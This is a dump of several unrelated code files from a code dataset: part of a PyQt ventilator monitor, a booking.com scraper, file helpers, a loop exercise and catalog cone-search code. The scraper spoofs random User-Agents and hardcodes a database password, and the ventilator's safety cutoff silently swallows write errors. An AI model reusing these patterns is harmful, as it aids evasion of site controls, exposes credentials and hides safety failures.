# Remove the first x element.\r\n self.graph1_y = self.graph1_y[1:] # Remove the first y element.\r\n self.graph1_x.append(self.graph1_x[-1] + elapsedTime) # Add a new value 1 higher than the last.\r\n # insFlowPoint = randint(0, 100) # Read Ins Flow Sensor\r\n self.graph1_y.append(insFlowPoint) # Add the new value\r\n self.graph1_data_line.setData(self.graph1_x, self.graph1_y) # Update the data.\r\n self.graph1_value.setText(_translate(\"MainWindow\", str(insFlowPoint))) # Update graph1 value label\r\n if self.insPhase:\r\n self.insFlowData_singleCycle.append(insFlowPoint)\r\n\r\n # Graph 2: Expiratory Flow\r\n if len(self.graph2_x) >= 100:\r\n self.graph2_x = self.graph2_x[1:] # Remove the first x element.\r\n self.graph2_y = self.graph2_y[1:] # Remove the first y element.\r\n self.graph2_x.append(self.graph2_x[-1] + elapsedTime)\r\n # expFlowPoint = randint(0, 100) # Read Exp Flow Sensor\r\n self.graph2_y.append(expFlowPoint) # Add a new random value\r\n self.graph2_data_line.setData(self.graph2_x, self.graph2_y) # Update the data.\r\n self.graph2_value.setText(_translate(\"MainWindow\", str(expFlowPoint))) # Update graph2 value label\r\n if not self.insPhase:\r\n self.expFlowData_singleCycle.append(expFlowPoint)\r\n\r\n # Graph 3: Lung Pressure\r\n if len(self.graph3_x) >= 100:\r\n \r\n self.graph3_x = self.graph3_x[1:] # Remove the first x element.\r\n self.graph3_y = self.graph3_y[1:] # Remove the first y element.\r\n self.graph3_x.append(self.graph3_x[-1] + elapsedTime) # Add a new value 1 higher than the last.\r\n # lungPrPoint = randint(0, 20) # Read pressure sensor\r\n self.graph3_y.append(lungPrPoint) # Add a new random value\r\n self.graph3_data_line.setData(self.graph3_x, self.graph3_y) # Update the data.\r\n self.graph3_value.setText(_translate(\"MainWindow\", str(lungPrPoint))) # Update graph3 value label\r\n \r\n # PEEP/PIP (mmHg)\r\n if self.insPhase and lungPrPoint > self.PIP:\r\n self.PIP = lungPrPoint\r\n self.PIP_value.setText(_translate(\r\n \"MainWindow\", str(round(self.PIP)))) # Update value label\r\n # SAFETY LOGIC\r\n if self.PIP >= self.sPIP: \r\n try:\r\n self.ser1_sol.write(b's') # write to port\r\n except:\r\n pass\r\n elif not self.insPhase and lungPrPoint < self.PEEP:\r\n self.PEEP = lungPrPoint\r\n self.PEEP_value.setText(_translate(\r\n \"MainWindow\", str(round(self.PEEP)))) # Update value label\r\n # SAFETY LOGIC\r\n if self.PEEP <= self.sPEEP: \r\n try:\r\n self.ser1_sol.write(b's') # write to port\r\n except:\r\n pass\r\n\r\n \r\n # Write to file\r\n if self.isRecording:\r\n self.ventTimer_data += elapsedTime\r\n with open(self.csvFilename, 'a', newline='') as csvfile:\r\n dataWriter = csv.writer(csvfile)\r\n dataWriter.writerow([self.ventTimer_data, lungPrPoint, insFlowPoint,expFlowPoint, O2_value])\r\n\r\n def updateClock(self):\r\n _translate = QtCore.QCoreApplication.translate\r\n\r\n time = QTime.currentTime()\r\n timeValue = time.toString('hh:mm:ss')\r\n\r\n if self.isRecording:\r\n self.ventTimer_s += 1\r\n ventTimeValue = datetime.timedelta(seconds=self.ventTimer_s)\r\n self.vent_time_value.setText(_translate(\r\n \"MainWindow\", str(ventTimeValue)))\r\n else:\r\n self.vent_time_value.setText(_translate(\r\n \"MainWindow\", \"N/A\"))\r\n\r\n self.time_value.setText(_translate(\r\n \"MainWindow\", timeValue))\r\n \r\n ### INE2IALIZE UI ###\r\n\r\n def retranslateUi(self, MainWindow):\r\n _translate = QtCore.QCoreApplication.translate\r\n MainWindow.setWindowTitle(_translate(\r\n \"MainWindow\", \"Woo Lab - COVID-19 Emergency Ventilation System\"))\r\n self.ITV_value.setText(_translate(\"MainWindow\", \"0\"))\r\n self.ITV_label.setText(_translate(\"MainWindow\", \"ITV (mL)\"))\r\n self.E2I_button_pos.setText(_translate(\"MainWindow\", \"+\"))\r\n self.E2I_label.setText(_translate(\r\n \"MainWindow\", \"E:I (ratio)\"))\r\n self.E2I_value.setText(_translate(\"MainWindow\", str(self.E2I)))\r\n self.E2I_button_neg.setText(_translate(\"MainWindow\", \"-\"))\r\n self.ETV_value.setText(_translate(\"MainWindow\", \"0\"))\r\n self.ETV_label.setText(_translate(\"MainWindow\", \"ETV (mL)\"))\r\n self.RR_button_neg.setText(_translate(\"MainWindow\", \"-\"))\r\n self.RR_button_pos.setText(_translate(\"MainWindow\", \"+\"))\r\n self.RR_label.setText(_translate(\"MainWindow\", \"RR (BPM)\"))\r\n self.RR_value.setText(_translate(\"MainWindow\", str(self.RR)))\r\n self.PEEP_value.setText(_translate(\"MainWindow\", \"5.2\"))\r\n self.PEEP_label.setText(_translate(\"MainWindow\", \"PEEP (mmHg)\"))\r\n self.sPEEP_value.setText(_translate(\"MainWindow\", \"2.0\"))\r\n self.sPEEP_button_neg.setText(_translate(\"MainWindow\", \"-\"))\r\n self.sPEEP_button_pos.setText(_translate(\"MainWindow\", \"+\"))\r\n self.sPEEP_label.setText(_translate(\"MainWindow\", \"Set PEEP (mmHg)\"))\r\n self.O2_value.setText(_translate(\"MainWindow\", \"28.3%\"))\r\n self.O2_label.setText(_translate(\"MainWindow\", \"FiO2\"))\r\n self.PIP_value.setText(_translate(\"MainWindow\", \"12.5\"))\r\n self.PIP_label.setText(_translate(\"MainWindow\", \"Peak Pr (mmHg)\"))\r\n self.sPIP_value.setText(_translate(\"MainWindow\", \"20.0\"))\r\n self.sPIP_button_neg.setText(_translate(\"MainWindow\", \"-\"))\r\n self.sPIP_button_pos.setText(_translate(\"MainWindow\", \"+\"))\r\n self.sPIP_label.setText(_translate(\"MainWindow\", \"Set PIP (mmHg)\"))\r\n self.PHASE_value.setText(_translate(\"MainWindow\", \"INS\"))\r\n self.PHASE_label.setText(_translate(\"MainWindow\", \"System Phase\"))\r\n self.time_label.setText(_translate(\"MainWindow\", \"Time\"))\r\n self.record_button.setText(_translate(\"MainWindow\", \"•\"))\r\n self.vent_time_label.setText(\r\n _translate(\"MainWindow\", \"Ventilation Time\"))\r\n self.graph1_label.setText(_translate(\"MainWindow\", \"INS\\n\"\r\n \"FLOW\"))\r\n self.graph1_value.setText(_translate(\"MainWindow\", \"52.6\"))\r\n self.graph1_units.setText(_translate(\"MainWindow\", \"SLPM\"))\r\n self.graph2_label.setText(_translate(\"MainWindow\", \"EXP\\n\"\r\n \"FLOW\"))\r\n self.graph2_value.setText(_translate(\"MainWindow\", \"24.1\"))\r\n self.graph2_units.setText(_translate(\"MainWindow\", \"SLPM\"))\r\n self.graph3_label.setText(_translate(\"MainWindow\", \"LUNG\\n\"\r\n \"PR\"))\r\n self.graph3_value.setText(_translate(\"MainWindow\", \"12.8\"))\r\n self.graph3_units.setText(_translate(\"MainWindow\", \"mmHg\"))\r\n\r\nif __name__ == \"__main__\":\r\n import sys\r\n app = QtWidgets.QApplication(sys.argv)\r\n MainWindow = QtWidgets.QMainWindow()\r\n ui = Ui_MainWindow()\r\n ui.setupUi(MainWindow)\r\n MainWindow.show()\r\n sys.exit(app.exec_())\r\n","sub_path":"software/ALIVEVent-WooLab-v1.0.py","file_name":"ALIVEVent-WooLab-v1.0.py","file_ext":"py","file_size_in_byte":82944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"144484594","text":"import requests, pymysql\nfrom fake_useragent import UserAgent\nimport time\nimport datetime as dt\nfrom bs4 import BeautifulSoup\n\n\n#Коннектор к БД\n_host = 'localhost'\n_user = 'sa'\n_password = 'QweAsd123'\n_db = 'test'\n\n\n#Методы записи/чтения из БД\ndef addHotel(city, city_link, hotel, hotel_link):\n addHotelCursor = conn.cursor()\n \n addHotelCursor.execute('SELECT 1 FROM `bc_hotels` WHERE `HotelLink` = %(hotel_link)s;', \\\n {'hotel_link':hotel_link})\n res = addHotelCursor.fetchone()\n \n if not res:\n addHotelCursor.execute('Insert into `bc_hotels` (`City`, `CityLink`, `Hotel`, `HotelLink`)'+\\\n 'values(%(city)s, %(city_link)s, %(hotel)s, %(hotel_link)s)',\\\n {'city':city, 'city_link': city_link, 'hotel':hotel, 'hotel_link':hotel_link})\n addHotelCursor.close()\n\n\ndef getHotels():\n \n getHotelsCursor = conn.cursor()\n getHotelsCursor.execute('SELECT `RecId`, `HotelLink`, ' +\\\n 'CASE WHEN `Latitude` is NULL or `Longitude` is NULL THEN 0 ELSE 1 END Coord FROM `bc_hotels`')\n \n hotels_cortege = getHotelsCursor.fetchall()\n getHotelsCursor.close()\n return hotels_cortege\n\n\ndef addRoom(rid, room_name, desc, capacity):\n addRoomCursor = conn.cursor()\n \n addRoomCursor.execute('SELECT 1 FROM `bc_rooms` WHERE `HotelRecId`= %(rid)s and `RoomName`= %(room_name)s',\\\n {'rid':rid, 'room_name':room_name})\n res = addRoomCursor.fetchone()\n \n if not res:\n addRoomCursor.execute('Insert into `bc_rooms` (`HotelRecId`, `RoomName`, `RoomDesc`, `Capacity`)'+\\\n 'values(%(rid)s, %(room_name)s, %(desc)s, %(capacity)s)',\\\n {'rid':rid, 'room_name':room_name, 'desc':desc, 'capacity': capacity})\n \n addRoomCursor.close()\n\n\n\n\n#Создаем фейковый UA\nua = UserAgent()\nheaders = {'User-Agent': ua.random}\n\n#Указываем страницы для чтения\nmain_link = 'https://www.booking.com'\ncities_link = '/destination/country/ru.ru.html'\n\n###############################################################\n# Первый акт: читаем города и проходимся, собирая отели в них #\n###############################################################\n'''ses = requests.session()\n\ncities_page = ses.get(main_link+cities_link, headers=headers)\nsoup = BeautifulSoup(cities_page.text)\nli_list = soup.find('li', {'class':'dest-sitemap__list-item'}).findAll('a')\n\ncities = []\nfor i in li_list:\n cities.append([i['title'], i['href']])\n\nhotels = []\ncnt = 0\nfor c, cl in cities:\n\n\n #можно раскомментировать\n \n cnt+=1\n if cnt == 1000:\n cnt = 0\n print(\"Еще 1000 городов обработано; всего:\"+str(len(cities)))\n \n \n city_page = ses.get(main_link+cl, headers=headers)\n soup = BeautifulSoup(city_page.text)\n li_list = soup.findAll('li', {'class':'dest-sitemap__list-item'})\n for li in li_list:\n for i in li.findAll('a'):\n if '/hotel/' in i['href']:\n _href = i['href']\n _href = _href[0:_href.find('?')]\n hotels.append([c, cl, i['title'], _href])\n #time.sleep(1)\n\n#Пишем отели в БД\nconn = pymysql.connect(host=_host, user=_user, password=_password, db=_db, charset='utf8mb4', autocommit=True)\nfor city, city_link, hotel, hotel_link in hotels:\n addHotel(city, city_link, hotel, hotel_link)\n\n#Постобработка\nconn.close()\nses.close()'''\n\n\n\n###################################################\n# Второй акт: Узнаем вместимость номеров в отелях #\n###################################################\n\n\n#получаем список отелей из БД и проходимся по нему\nconn = pymysql.connect(host=_host, user=_user, password=_password, db=_db, charset='utf8mb4', autocommit=True)\nhotels_list = getHotels()\nconn.close()\n\ncnt = 0\nerr_list =[]\nfor rid, link, coord in hotels_list:\n\n #переоткрываем сессию каждые 1000 строк\n if cnt == 0:\n conn = pymysql.connect(host=_host, user=_user, password=_password, db=_db, charset='utf8mb4', autocommit=True)\n ses = requests.session()\n headers = {'User-Agent': ua.random}\n\n \n hotel_page = ses.get(main_link+link, headers=headers, allow_redirects=False)\n cnt+=1\n\n #парсим содержимое страницы\n if not hotel_page.status_code in [301,302]:\n soup = BeautifulSoup(hotel_page.text)\n \n if soup.find('div', {'class':'header-404'}):\n time.sleep(1.2)\n hotel_page = ses.get(main_link+link, headers=headers, allow_redirects=False)\n soup = BeautifulSoup(hotel_page.text)\n \n \n rooms_table = soup.find('table', {'class':'roomstable'})\n if not rooms_table:\n time.sleep(3)\n err_list.append([rid, link])\n\n else:\n rooms_list = rooms_table.find('tbody')\n\n table = []\n for tr in rooms_list.findAll('tr'):\n class_attr_list = tr.attrs.get('class')\n if class_attr_list:\n if 'extendedRow' not in class_attr_list:\n table.append(tr)\n\n for tr in table:\n\n for n, td in enumerate(tr.findAll('td')):\n if n == 0:\n capacity = td.find('span', {'class':'occupancy_adults'})['title'].split(': ')[1]\n if n == 1:\n room_name = td.find('div',{'class':'room-info'}).a.text.replace('/n', ' ')\n if not td.ul:\n desc = 'Empty'\n else:\n desc = td.ul.text.replace('/n', ' ')[0:512]\n if n == 2:\n addRoom(rid, room_name, desc, capacity)\n\n #перезакрываем сессию каждые 1000 строк\n if cnt == 1000:\n cnt = 0\n #можно раскомментировать\n '''\n print(\"Еще 1000 отелей обработано; всего:\"+str(len(hotels_list)))\n '''\n conn.close()\n ses.close()\n\n\n\nprint('Не загружена информация об отелях:', err_list)\n\n\n#Еще раз все закрываем\nses.close()\ntry:\n conn.close()\nexcept:\n pass","sub_path":"Parsers/booking_grabber/hotels_spider.py","file_name":"hotels_spider.py","file_ext":"py","file_size_in_byte":6542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"72578562","text":"import os\n# read from file\ndef read(path,filename, count = 1):\n '''\n Read from file\n '''\n l = path + filename\n assert filename != '' or path != ''\n f = open(l, 'r')\n if count == 1:\n temp = f.read()\n else:\n temp = f.read(count)\n f.close()\n return temp\n\n\n\n# write to file\ndef write(path, filename, line):\n '''\n write to file\n '''\n l = path + filename\n assert filename != '' or path != ''\n f = open(l, 'w')\n f.write(line)\n f.close()\n return \"Успешно\"\n\n# rewrite file\ndef writeAppend(path, filename, line):\n '''\n rewrite\n '''\n l = path + filename\n assert filename != '' or path != ''\n f = open(l, 'a')\n f.write(line)\n f.close()\n return \"Успешно\"\n\n#\ndef findFileInCatalog(path, line):\n '''\n find file in catalog\n '''\n cons = []\n for d, dirs, files in os.walk(path):\n for f in files:\n cons.append(f)\n\n if line in cons:\n return True\n else:\n return False\n \n \n# find da in file\ndef findDataInFile(path, filename, data):\n '''\n find data in file\n '''\n l = path + filename\n assert filename != '' or path != ''\n f = open(l, 'r')\n temp = f.read()\n if data in temp:\n return True\n else:\n return False\n \n \n \n\n \n# sort data \ndef sort(path, filename):\n '''\n sort data\n '''\n points = {}\n l = path+filename\n for line in open(l):\n (val, key) = line.split()\n points[int(val)] = key \n\n l = lambda x: x[0]\n m= sorted(points.items(), key=l, reverse=False)\n \n return m \n\n\n","sub_path":"4 semestr/4 семестр/Програмування/Программы на Python/Лабараторная №3/function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"354109770","text":"\" Looping Syntax \"\nlist = [1,2,3,4,5]\nfor x in list:\n print(x)\n\nprint(\"\\nNow printing names...\\n\")\n\n\" Another example \"\nnames = ['Joe', 'Peter', 'Jim', 'Josh']\nfor name in names:\n print(name)\n","sub_path":"exercises/basics/for_loop.py","file_name":"for_loop.py","file_ext":"py","file_size_in_byte":198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"626731571","text":"\n\"\"\"*******************************************************\nA python implementation of catsHTM.m\n******************************************************\"\"\"\n#print __doc__\n\nimport math\nimport numpy as np\nfrom . import celestial\nimport scipy.io as sio\nfrom . import params\nimport os.path\nimport h5py\nfrom . import class_HDF5\nimport time\nimport pdb\n#import time\n\nd=dict() #this dictionnary containes the names of the index files loaded in search_htm_ind, and allowes us to avoid loading twice the same index file, which can be time consuming e.g. in a loop\n\n# define FileNotFoundError for Python 2.7\ntry:\n FileNotFoundError\nexcept NameError:\n FileNotFoundError = IOError\n\n__all__=['cone_search','search_htm_ind','htm_search_cone','xmatch_2cats','load_trix_by_ind','simplify_list','load_colcell','mfind_bin','match_cats','simplify2','simplify3','Example_QueryAllFun','read_ztf_HDF_matched'] #redefinition of '*' for import *\n\ndef get_CatDir(CatName):\n if CatName == 'TMASS':\n CatDir = '2MASS'\n elif CatName == 'TMASSxsc':\n CatDir = '2MASSxsc'\n elif CatName == 'DECaLS':\n CatDir = 'DECaLS/DR5'\n elif CatName == 'GAIADR1':\n CatDir = 'GAIA/DR1'\n elif CatName == 'GAIADR2':\n CatDir = 'GAIA/DR2'\n elif CatName == 'GALEX':\n CatDir = 'GALEX/DR6Plus7'\n elif CatName == 'HSCv2':\n CatDir = 'HST/HSCv2'\n elif CatName == 'IPHAS':\n CatDir = 'IPHAS/DR2'\n elif CatName == 'NEDz':\n CatDir = 'NED/20180502'\n elif CatName == 'SDSSDR10':\n CatDir = 'SDSS/DR10'\n elif CatName == 'SDSSoffset':\n CatDir = 'SDSS/DR14offset'\n elif CatName == 'SpecSDSS':\n CatDir = 'SpecSDSS/DR14'\n elif CatName == 'SAGE':\n CatDir = 'Spitzer/SAGE'\n elif CatName == 'IRACgc':\n CatDir = 'Spitzer/IRACgc'\n elif CatName == 'UKIDSS':\n CatDir = 'UKIDSS/DR10'\n elif CatName == 'VISTAviking':\n CatDir = 'VISTA/Viking/DR2'\n elif CatName == 'VSTatlas':\n CatDir = 'VST/ATLAS/DR3'\n elif CatName == 'VSTkids':\n CatDir = 'VST/KiDS/DR3'\n elif CatName not in ['AKARI', 'APASS', 'Cosmos', 'FIRST', 'NVSS', 'PS1', 'PTFpc', 'ROSATfsc', 'SkyMapper', 'UCAC4',\n 'WISE', 'XMM']:\n raise ValueError('you need to specify a valid name for the catalog (see README file for list of names)')\n else:\n CatDir = CatName\n return CatDir\n\ndef cone_search(CatName,RA,Dec,Radius,catalogs_dir='./data',RadiusUnits='arcsec',IndexFileTemplate=params.IndexFileTemplate,CatFileTemplate=params.CatFileTemplate\n ,htmTemplate=params.htmTemplate,NcatinFile=params.NcatinFile,IndexVarname=None,ColRa = 0,ColDec=1,OnlyCone=True,\n ColCelFile = params.ColCelFile,OutType= 'np_array',verbose=False):\n \"\"\"Description: Perform a cone search around RA/Dec on a local catalog in HDF5 format sorted into HTM.\n Input : - Catalog name (e.g., 'GAIADR1'). \n - J2000.0 R.A. [radians, [H M S], or sexagesimal string].\n - J2000.0 Dec. [radians, [sign D M S], or sexagesimal string].\n - Search radius [arcsec].\n - Optionnal:RadiusUnits - Radius units. Default is 'arcsec'. DO NOT CHANGE THIS DEFAULT\n IndexFileTemplate - Index Catalog name template. Default is '%s_htm.hdf5'.\n CatFileTemplate - Catalog name template. Default is '%s_htm_%06d.hdf5'.\n htmTemplate - HTM dataset template name. Default is 'htm_%06d'.\n NcatInFile - Maximum number of Datasets in file.Default is 100.\n IndexVarName - Default is None.\n ColRA - Default is 1.\n ColDec - Default is2.\n OnlyCone - Return only sources within cone. If false will return also some objects outside cone. Default is true.\n ColCellFile - Default is '%s_htmColCell.mat'.\n By : Maayane Soumagnac (original Matlab function by Eran Ofek) Feb 2018\n Output : a numpy array where each line is the catalog line for the sources inside the cone \"\"\"\n #start_time=time.time()\n if verbose==True:\n print('*************')\n print('Catalog: {0}; cone radius: {1} arcsec; cone center: (RA,DEC)=({2},{3})'.format(CatName,Radius,RA,Dec))\n print('*************')\n\n root_to_data=catalogs_dir+'/'\n CatDir=get_CatDir(CatName)\n\n Rad = 180. / math.pi\n\n #if RadiusUnits=='arcsec':\n Radius=Radius/(Rad*3600) #converts arcsec radius into radians radius\n\n ColCelFile=ColCelFile % CatName\n IndexFilename=IndexFileTemplate % CatName\n print(root_to_data+CatDir+'/'+ColCelFile)\n if os.path.isfile(root_to_data+CatDir+'/'+ColCelFile)==True:\n test = sio.loadmat(root_to_data+CatDir+'/'+ColCelFile)\n #print(test)\n if np.shape(test['ColCell'])[1]1:\n ColCell=np.empty((np.shape(cat_onlycone)[1]),dtype=object)\n ColUnits=np.empty((np.shape(cat_onlycone)[1]),dtype=object)\n else:\n ColCell=np.empty((Ncol),dtype=object)\n ColUnits=np.empty((Ncol),dtype=object)\n\n #print(np.shape(test['ColCell']))\n #print(np.shape(ColCell))\n #print(np.shape(cat_onlycone))\n\n if np.shape(test['ColCell'])[1]>np.shape(test['ColCell'])[0]:\n for i,j in enumerate(test['ColCell'][0,:]):\n #print(test['ColCell'][0,i][0])\n ColCell[i]=str(test['ColCell'][0,i][0])\n for i,j in enumerate(test['ColUnits'][0,:]):\n if len(test['ColUnits'][0,i])>0:\n ColUnits[i]=str(test['ColUnits'][0,i][0])\n else:\n ColUnits[i]=' '\n\n else: #rare cases: Cosmos and TMASSxsc\n for i,j in enumerate(test['ColCell'][:,0]):\n #print(str(test['ColCell'][i][0][0]))\n ColCell[i]=str(test['ColCell'][i][0][0])\n for i,j in enumerate(test['ColUnits'][0,:]):\n if len(test['ColUnits'][0,i])>0:\n ColUnits[i]=str(test['ColUnits'][0,i][0])\n else:\n ColUnits[i]=' '\n\n return cat_onlycone,ColCell, ColUnits\n\ndef search_htm_ind(Filename,Long,Lat,Radius,path,VarName=None,CatDir=None,verbose=False):\n \"\"\"Description: wrapper of htm_search_cone, which select from the vector outputed by htm_search_cone only the\n triangles where there are actually sources.\n Input : - Filename: the name of the index_file, e.g. FIRST_htm.hdf5\n Output :\n By : Maayane Soumagnac (original Matlab function by Eran Ofek) Feb 2018\n\n \"\"\"\n if VarName==None:\n cat_name=Filename.split('_')[0]\n VarName=cat_name+'_HTM'\n\n if VarName not in list(d.values()):\n if verbose==True:\n print('I have not seen the index file corresponding to {0} yet'.format(VarName))\n DataHTM_indexfile = class_HDF5.HDF5(path + '/' + CatDir + '/' + Filename).load(VarName,\n numpy_array=True) # load the indexfile content\n d[str(VarName)+'_name']=VarName\n d[str(VarName)+'_array']= DataHTM_indexfile\n else:\n if verbose==True:\n print('I have already loaded the index file corresponding to {0}'.format(VarName))\n DataHTM_indexfile = d[str(VarName) + '_array']\n\n '''\n #A working alternative to the dictionnay d, with globals()\n if VarName not in list(globals().values()):\n if verbose==True:\n print('I have not see the index file corresponding to {0} yet'.format(VarName))\n print(path + '/' + CatDir + '/' + Filename)\n print(VarName)\n DataHTM_indexfile = class_HDF5.HDF5(path + '/' + CatDir + '/' + Filename).load(VarName,\n numpy_array=True) # load the indexfile content\n\n globals()[str(VarName)+'_name'] = VarName\n globals()[str(VarName)+'_array']= DataHTM_indexfile\n\n else:\n if verbose==True:\n print('I have already loaded the index file corresponding to {0}'.format(VarName))\n DataHTM_indexfile = globals()[str(VarName)+'_array']\n '''\n ID=htm_search_cone(DataHTM_indexfile,Long,Lat,Radius)#,Son_index=Son_index,PolesLong_index=PolesLong_index,PolesLat_index=PolesLat_index) # returns a list of the ID of the winners mesh, i.e. the meshes that intercept the circle\n\n ID_array=np.array(ID)\n ID_w_sources=ID_array[DataHTM_indexfile[12,ID]>0] #ou l inverse?\n return ID_w_sources\n\ndef htm_search_cone(IndexFile_data,Long,Lat,Radius,Ind=None,Son_index=np.arange(2,6),PolesLong_index=np.arange(6,11,2),PolesLat_index=np.arange(7,12,2)):\n #print('I am running htm_search_cone')\n \"\"\"Description: Search for all HTM leafs intersecting a small circles\n Input :-Either a table of HTM data or an open HDF5 object in which the HTM data is stored\n -Longitude (radians) to search\n -Latitutde (radians) to search\n -Radius of the small circle\n Output : a vector of indexes of the winner(s):the \"adress\" in the indexfile of the smallest leaf(s) intercepting the cone\n By : Maayane Soumagnac (original Matlab function by Eran Ofek) Feb 2018\n\n \"\"\"\n if Ind is None:\n Sons=np.arange(8)\n else:\n Sons=Ind.astype(int)\n ID=[]\n Nsons=len(Sons)\n PolesLong=np.zeros((3,Nsons)) #3 lines, Nsons colomns, on veut mettre a chaque colomne les longitudes des poles du mesh\n PolesLat=np.zeros((3, Nsons)) #3 lignes, Nsons colomnes\n\n for i in range(Nsons):#OPTIMIZE\n PolesLong[:,i]=IndexFile_data[PolesLong_index[:],Sons[i]] # array where each colomn is the 3 poles longitudes of a son mesh HERE: THIS? OR INVERSE?\n PolesLat[:,i]=IndexFile_data[PolesLat_index[:],Sons[i]] # array where each colomn is the 3 poles latitude of a son mesh HERE: THIS? OR INVERSE?\n\n Flag=celestial.cone_in_polysphere(PolesLong,PolesLat,Long,Lat,Radius) #check if the cone intercept any of the sons meshes\n\n for i in range(Nsons): #OPTIMIZABLE?\n if Flag[i]==1: #i.e. if the cone overlap the son with index i\n if np.isnan(IndexFile_data[Son_index[:],Sons[i]]).all()==True:# there are nans in the index_file at the son's index, which means the data is where you are and you cannot go further in the tree\n ID.append(Sons[i])\n else:\n Ind = IndexFile_data[Son_index[:], Sons[i]] - 1.\n #RECURION IS HERE\n ID.extend(htm_search_cone(IndexFile_data,Long,Lat,Radius,Ind=Ind))\n\n return ID\n\ndef get_index_filename(CatName):\n \"\"\"Description: gets the name of the index file for\n Input :- Catalog basename (e.g. 'PS1')\n Output :-name of the index filename : _htm.hdf5 (carefull! in the paper we wrote this as _htm_ind.hdf5) (e.g. 'PS1_htm.hdf5')\n -a string _HTM (e.g. 'PS1_HTM'), which is the key of the dataset, in the HDF5 file, that contains the 2 columns of the index file\n example: [IndexFileName,IndexVarName]=catsHTM.get_index_filename('PS1')\n By : Maayane Soumagnac (original Matlab function by Eran Ofek) August 2018\n \"\"\"\n IndexFileName=CatName+'_htm.hdf5'\n IndexVarName=CatName+'_HTM'\n return IndexFileName,IndexVarName\n\ndef load_HTM_ind(Filename,VarName,catalogs_dir='./data',CatDir=None):\n \"\"\"Description: load the content of the catalog index file into a dictionnary\n Input :- index file: an HDF5 file which exists per catalog, containing a 2D array with as many columns as trixels (the index=the column indixe+1: index1 is in columns 0)and each line being:\n [level,Father index,son1 index,son2 index,son3 index,son4 index, Pole1 long, Pole1 lat,Pole2 long, Pole2 lat,Pole3 long, Pole3 lat, either Nan or the data].\n - The name of the dataset with the actual 2D array stored in the index file. Default is '_HTM'\n Output :- A list of N_trixels dictionnaries containing the 2D matrix info\n example:\n By : Maayane Soumagnac (original Matlab function by Eran Ofek) August 2018\"\"\"\n #print('I am looking for the data in',catalogs_dir + '/' + CatDir + '/' +Filename)\n Data=class_HDF5.HDF5(catalogs_dir + '/' + CatDir + '/' +Filename).load(VarName,numpy_array=True)#as many columns as trixels, 13 lines with:\n # [index,Father index,son1 index,son2 index,son3 index,son4 index, Pole1 long, Pole1 lat,Pole2 long, Pole2 lat,Pole3 long, Pole3 lat, either Nan or the data]\n N_trixels=np.shape(Data)[1]\n #print('there are {0} trixels'.format(N_trixels))\n #load this data into a dictionnaries\n #each trixel is a dictionnary\n HTM_list=[]#will end up being a list of N_trixels dictionnaries\n for i in range(N_trixels):\n trixel = dict()\n trixel['level']=Data[0,i]#line 1 of column 0\n if np.isnan(np.array(Data[1,i])).all() == True:\n trixel['father']=[]\n else:\n trixel['father']=Data[1,i]\n if np.isnan(np.array(Data[2,i])).all() == True:\n trixel['son']=[]\n else:\n trixel['son']=Data[2:6,i]\n trixel['PolesCoo'] = np.zeros((3, 2))\n trixel['PolesCoo'][0, 0] = Data[6,i]\n trixel['PolesCoo'][0, 1] = Data[7,i]\n trixel['PolesCoo'][1, 0] = Data[8,i]\n trixel['PolesCoo'][1, 1] = Data[9,i]\n trixel['PolesCoo'][2, 0] = Data[10,i]\n trixel['PolesCoo'][2, 1] = Data[11,i]\n trixel['Nsrc']=Data[12,i]\n HTM_list.append(trixel)\n return HTM_list,Data\n\ndef load_colcell(CatDir,CatName):\n ColCelFile = CatDir+'/'+CatName + '_htmColCell.mat'\n test = sio.loadmat(ColCelFile)\n if np.shape(test['ColCell'])[1] < np.shape(test['ColCell'])[0]:\n # test=test.transpose()\n Ncol = np.shape(test['ColCell'])[0]\n else:\n Ncol = np.shape(test['ColCell'])[1]\n ColCell = np.empty((Ncol), dtype=object)\n ColUnits = np.empty((Ncol), dtype=object)\n if np.shape(test['ColCell'])[1] < np.shape(test['ColCell'])[0]:\n # test=test.transpose()\n Ncol = np.shape(test['ColCell'])[0]\n for i, j in enumerate(test['ColCell'][:, 0]):\n # print(str(test['ColCell'][i][0][0]))\n ColCell[i] = str(test['ColCell'][i][0][0])\n for i, j in enumerate(test['ColUnits'][0, :]):\n if len(test['ColUnits'][0, i]) > 0:\n ColUnits[i] = str(test['ColUnits'][0, i][0])\n else:\n ColUnits[i] = ' '\n else:\n Ncol = np.shape(test['ColCell'])[1]\n for i, j in enumerate(test['ColCell'][0, :]):\n # print(test['ColCell'][0,i][0])\n ColCell[i] = str(test['ColCell'][0, i][0])\n for i, j in enumerate(test['ColUnits'][0, :]):\n if len(test['ColUnits'][0, i]) > 0:\n ColUnits[i] = str(test['ColUnits'][0, i][0])\n else:\n ColUnits[i] = ' '\n return ColCell, ColUnits\n\ndef load_trix_by_ind(CatName,index,SearchParValue=None,num=100,catalogs_dir='./data',Ncol=None,Verbose=True):#load_cat in Eran's library\n \"\"\"Description: given a catalog basename and the index of a trixel, load the content of the corresponding trixel dataset to a numpy array\n Input :- CatName\n - trixel index, or a a dataset name\n - A two element vector of lower and upper value. Only lines in which the sorted parameter is between the low and high value will be retrieved.\n If empty, retrieve all lines. Default is empty.\n -number of columns in the catalog.\n Output :-a numpy array with the content of the trixel, Ind ?\n example:\n By : Maayane Soumagnac (original Matlab function by Eran Ofek) August 2018\"\"\"\n\n if isinstance(index,str)==False:\n names=get_file_dataset_from_trixel_id(CatName,index,NfilesinHDF=num,Verbose=Verbose)\n Filename=names[0]\n Data_set_name=names[1]\n CatDir=get_CatDir(CatName)\n\n if SearchParValue is None:\n trixel_data=class_HDF5.HDF5(catalogs_dir + '/'+ CatDir + '/' + Filename).load(Data_set_name, numpy_array=True).T\n Ind=1\n else:\n #load the index file\n VarIndStr=Data_set_name+'_Ind' #the name of the index file\n if Verbose==True:\n print('Filename is',Filename)\n DataInd=class_HDF5.HDF5(catalogs_dir+'/'+CatDir+'/'+Filename).load(VarIndStr,numpy_array=True,Verbose=Verbose).T#the content f the index file\n if len(DataInd)>0:\n Ndi=np.shape(DataInd)[0]\n I1=bin_sear(DataInd[:,1],SearchParValue[0])\n I2=bin_sear(DataInd[:,1],SearchParValue[1])\n #print('before the if, I1 is {0} and I2 is {1}'.format(I1,I2))\n 